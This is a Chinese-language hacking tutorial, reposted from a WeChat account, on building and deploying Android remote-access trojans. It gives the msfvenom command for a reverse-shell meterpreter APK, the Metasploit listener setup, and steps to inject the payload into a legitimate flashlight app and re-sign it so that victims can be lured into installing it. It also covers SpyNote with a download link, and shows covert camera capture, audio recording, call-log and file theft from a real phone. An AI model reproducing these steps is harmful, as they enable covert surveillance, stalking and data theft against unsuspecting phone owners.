专栏首页黑客网络技术如何利用手机木马远程控制

如何利用手机木马远程控制

1.实验涉及复现环境

  • Kali平台(Hack):192.168.0.101
  • Android模拟器(靶机1):192.168.0.106
  • Android魅族note2手机(靶机2):192.168.0.104
  • Java环境,.net环境构建 。(spyNote软件需要环境)

2.环境配置二Android模拟器

2.1首先从官网上下载雷电模拟器

2.2下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。

2.3 安装完成后在电脑桌面显示下面logo

2.4 对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

2.5 安装成功后显示安装成功:

3.生成后门

3.1打开虚拟机,启动kali,打开终端,生成apk后门。lhost为windows的ip(可以根据自己的IP设定),lport指定一个端口5001。打开终端输入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk

(生成apk文件)

3.2生成文件后我们到/etc/222.apk目录下拷贝我们的apk文件到我们的windows平台下然后启动我们的雷电模拟器,点击启动:

(启动界面)

3.3在右下角有个apk,点击选择文件安装。

3.4然后为了测试我们使用模拟器安装apk文件:

(成功安装木马文件)

4 使用metasploit控制台对模拟器进行攻击:

4.1 启动metasploit:

(启动界面)

4.2 使用模块:use exploit/multi/handler

(设置exploit)

4.3 设置模块set payload android/meterpreter/reverse_tcp

(paload设置)

4.4 设置攻击机和端口号和启动:

(参数配置)

4.5 显示正在监听靶机:

(监听中)

4.6 回到我们的模拟器靶机,我们点击运行我们安装的文件

(双击运行)

4.7 看到成功返回shell

(返回shell)

4.8 查看模拟手机的版本信息:sysinfo

(手机操作系统信息)

4.9 返回我们的模拟器,启动虚拟终端,查看攻击机和靶机的建立的联系:

(靶机被控的联系)

5 启用真机测试

5.1 步骤如以上环境,我在自己的手机上安装这个apk文件:

(note2手机安装)

5.2 按照上面获取shell的方法成功连接真机.:

(连接真机成功)

5.3 手机攻击演示:获取版本信息:

(手机版本信息)

5.4查看网络信息:(ifconfig)

(手机网络状态)

5.5查看root状态:

(显示手机未root)

5.6 启用网页视屏聊天:

(手机未找到合适的浏览器打开)

5.7查看手机有几个摄像头

(显示有2个)

5.8进行调用摄像头偷拍(默认前置摄像头):

5.9网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法获取到的一段图片资料:

5.10 进行录音操作:

(成功录音并保存)

5.11 获得shell后有很多的攻击方法,我就不一一操作,将其汇总如下:

(网络和系统信息获取)

(系统命令执行和摄像头操作)

6 远控升级之捆绑app:

说明:现实生活中没有人会傻乎乎的下载个木马apk文件呀,所以我们的通过一些伪装的办法,将apk木马文件捆绑在用户常用的App上,诱导用户下载使用。步骤如下:先捋一下思路,把PAYLOAD小马注入到一个目标apk文件中,关键是要找到目标APK的入口,并把启动payload小马的代码添加进去,随目标APK一起启动,从而实现监听手机的目的。当然前提是apk文件可逆。这里使用注入目标apk文件:手电筒—-魅族市场下载的(名为shoudiantong.apk)。我们使用上文攻击魅族手机用到的222.apk文件。

6.1 反编译payload小马222.apk和shoudiantong.apk(说明:反编译软件kali系统中自带,以下操作在windows,所以需要下载一个apktool。

命令:

apktool d houmen.apk

apktool d shoudiantong.apk

(反编译生成两个新文件)

6.2 开始寻找手电筒shoudiantong.apk文件的入口,在手电筒shoudiantong的Manifest.xml文件中查找Main和Launch关键词,定位到所对应的启动smail文件

6.3 直接搜索onCreat函数,找到bundle对象,你并在下面添加启动paload添加如下代码:(改动文件:MainActivety.smail)

6.4 点击保存之后呢,我们还要把刚才反编译的payload文件中的smail代码复制过来,把payload的smail/com/metasploit文件复制到手电筒的smail/com/目录下。

6.5 回编译:apktool b shoudiantong.apk

6.6 签名,这一部需要完成,发现没有签名的apk文件安装时会解析错误,生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222因为我在本机没有这个工具,所以在kali系统完成:

6.7 给shoudiantong.apk签名:

6.8 Shoudiantong.apk木马文件测试,将手电筒apk文件装在手机上:

6.9 打开并正常使用完全没问题:

7 进行手机攻击

7.1 查看手机与攻击机建立的联系

7.2 试着操作一些上述没有操作过的命令试试:

7.3 查看路由信息:

7.4 ps查看进程:

8 总结:

通过对手机木马文件对手机的植入,我们可以成功的对手机进行控制,其中包括对手机使用者进行录音、拍照、查看下载手机私密文件,获取手机网络信息,进程信息等。实现对手机的完全控制。本文简单介绍如何将木马文件绑定到正常app实现对受害者攻击,其实还有很多办法,如通过中间人、钓鱼实现木马植入等。

9 图形界面控制软件SpyNote的使用:

10 环境配置三java环境和.net环境:

  • 首先进入点击打开链接下载。
  • 下载后得到exe文件,直接运行
  • 出现以下画面,点击安装,下一步既可以完成安装:
  • 安装完成后,打开cmd,输入java-version出现版本号,说明安装成功:
  • .net环境安装:进入微软官网。(为避免木马、病毒等隐患,我们尽量从官网下载程序文件)
  • 在搜索框中输入Microsoft .NET Framework,选择【搜索microsoft.com】,点击【搜索】按钮。
  • 返回搜索结果,我们选择第2项【Download Microsoft .NET Framework 4(独立安装程序)】链接点击进入.
  • 打开软件的下载页面,点击【下载】 弹出下载窗口,选择保存位置。
  • 下载完成后,双击运行下载的文件。
  • 和安装其他软件一样,依次点击【下一步】,直至安装完成。这时.net运行环境安装完毕,就可以运行之前无法打开的EXE程序文件了

11 spynote安装使用

11.1百度搜索“spynote下载”找到相应的安装包,或者访问地址:(http://www.rekings.com/spynote-v5-android-rat/)进行下载下载后使用解压密码:rekings.com打开:

11.2 双击运行软件出现以下界面填写一个大于1023的端口,默认2222

(填写端口)

11.3配置生成木马apk文件我这里配置端口:222我们的攻击机为:192.168.0.100也就是我计算机的ip,然后应用的名字test,点击上方的build就可以生成文件:

11.4演示过程涉及一些个人隐私,所以在演示的过程中我们用上面实验中用到的手机模拟器来代替打开我们的雷电模拟器,点击右下角的apk安装,把我们生成的apk文件安装(test.apk文件默认放在C:\Administrator\output):

(安装apk文件)

12 攻击演示:

12.1 回到spyNote软件,我们发现有一台机器成功上线:

12.2 在设备上右击选择 tools P依次有一些命令执行:

(攻击方式)

12.3 我们选择tools p>record calls得到手机的通话记录

(通话记录)

12.4 我们选择tools p>record calls得到手机的通话记录install aplications查看手机的安装的应用软件:

(安装的软件)

12.5 我们选择tools p>file managerke可以查看手机里面的文件,可以任意下载,拷贝,删除等等。

(文件管理)

12.6 我们选择tools p>romote commands可以进行远程终端管理:

(远程终端管理)

13 总结:

功能太多,不一一演示,其中还包括照相、监听电话声音、查看通讯录、发送短信等等一些功能,等于自己手机咯都不用买手机

本文分享自微信公众号 - 黑客网络技术(Hacker202101),作者:Mr wang

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-12-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CTF实战23 木马攻击技术

    值得注意的是,木马屠城记并非于古希腊诗人荷马的两部著作伊利亚特与奥德赛里记载,而是在罗马帝国时期的诗人维吉尔所写的史诗《埃涅阿斯纪》中, 才第一次被记载

    用户1631416
  • 躲不掉的红色炸弹,这次真的「爆」了

    声明:本文由【MS509 Team】成员expsky原创,仅用于技术交流分享,禁止将相关技术应用到不当途径。 收到朋友的婚宴请帖后通常都要破费,而且不便躲避,所...

    FB客服
  • 黑客常用的木马工具

    大家经常会听到“木马”一词。究竟木马是什么东西呢?这篇文章里我会向大家介绍“特洛伊木马”、“特洛伊木马”的使用以及特洛伊木马的防范等。

    知识与交流
  • 浅谈互联网挂马与检测技术

    在形形色色的互联网中,网站被挂马是非常严重的安全事件,因为这不仅标志着自己的网站被控制,而且还会影响到网站的用户,不管是杀毒软件的“友情”提示还是用户中木马,对...

    C4rpeDime
  • RAT远程访问木马主控端全网探测分析

    RAT 简介 远程访问木马(RAT,remote access Trojan)是一种恶意程序,其中包括在目标计算机上用于管理控制的后门。通常攻击者会将远程访问...

    安恒信息
  • 窃听电话的Hacking Team RCSAndroid木马

    安卓设备小心:4.0-4.3版本都可以被RCSAndroid 搞定。 安卓平台上的远程控制木马RCSAndroid是目前曝光的安卓中最专业、最复杂的恶意程序之一...

    FB客服
  • 木马的前世今生:上线方式的发展及新型上线方式的实现

    0x00 前言 在讲文章主题之前,我们还是习惯性地聊(che)一(che)聊(dan)。 远程控制木马大家都不陌生,尤其是早期接触黑客技术的人,应该可以发现早在...

    FB客服
  • 木马病毒介绍 Trojans virus backdoor rootkit

    木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源...

    C4rpeDime
  • 常见的木马分类你知道

    木马又称“间谍软件spyware”、“后门程序backdoor”,最新发展为“恶意程序”或叫“流氓程序”。

    知识与交流
  • SpyNote V5.0图形化工具远程管理Android手机教程(附视频)

    前言 本篇文章主要以图文教程和视频演示详细地教你如何快速学会使用SpyNote 5.0图形化工具来穿透内网远程控制Android手机。本教程有一定的杀伤力,请各...

    FB客服
  • 利用frp搭建公网Metasploit并使用Shellter实现简单木马免杀

    免责声明:本公众号安全类、工具类文章仅用于安全学习、安全研究、技术交流,内容来源于互联网已公开内容,若读者利用此文所提供的信息而造成的任何直接或间接的后果和损失...

    yuanfan2012
  • 赛门铁克发现名为Dendroid的超强手机木马

    Android平台现在越来越容易受到攻击,因为总有一些黑客在使出浑身解数来研发新的技术,想像“上帝”一样操纵他人手机,可惜这样永远不是“上帝”,“上帝”不会唯利...

    FB客服
  • 你的Linux服务器是怎么成为肉鸡的?

    简单实施,服务器是怎么成为肉鸡?受到dos攻击后是什么状况?成为肉鸡之后如何简单的溯源?查找攻击ip?查杀进程

    Floating dream
  • Android木马如何实现用户定位技术?

    这几年安卓系统的普及速度可谓迅猛,一时间各式各样的设备都承载着安卓系统,手机、平板、机顶盒等都忠实地成为了安卓系统的用户。由于安卓系统在移动设备上的使用率最高,...

    FB客服
  • IPC远程入侵

    一、什么是IPC 进程间通信(IPC,Inter-Process Communication),指至少两个进程或线程间传送数据或信号的一些技术或方法。进程是计...

    知识与交流
  • 它们的屠城史–木马技术发展趋势与回顾

    新的学期开始了,某大学网络管理专业三年级的同学们显得特别兴奋,这个学期的课程安排里终于出现了“网络安全”课程,一直对安全技术甚至黑客攻防手段感兴趣的同学更是对这...

    HACK学习
  • 计算机木马是如何产生的?原理是什么?

    作为一个从业十几年的程序员来分析下计算机木马原理,计算机木马原来称呼为特洛伊木马,主要流传于古希腊,攻城不对久攻不下,于是让人专门制作了一个体积非常大的马,把士...

    程序员互动联盟
  • 网络安全自学篇(二十三)| Web安全学习路线及木马、病毒和防御初探

    自幼受贵州大山的熏陶,养成了诚实质朴的性格。经过寒窗苦读,考入BIT,为完成自己的教师梦,放弃IT、航天等工作,成为贵财一名大学教师,并想把自己所学所感真心传授...

    天钧
  • 高清无码!比鬼片还刺激!且听“诡娃”远控的这首惊魂曲

    近日,360云安全系统发现一款名为“诡娃”的远控木马,正通过钓鱼软件、网页挂马等多渠道扩散。“诡娃”除了能进行操控中招电脑等行为外,还会通过控制指令让中招机器弹...

    C4rpeDime

扫码关注云+社区

领取腾讯云代金券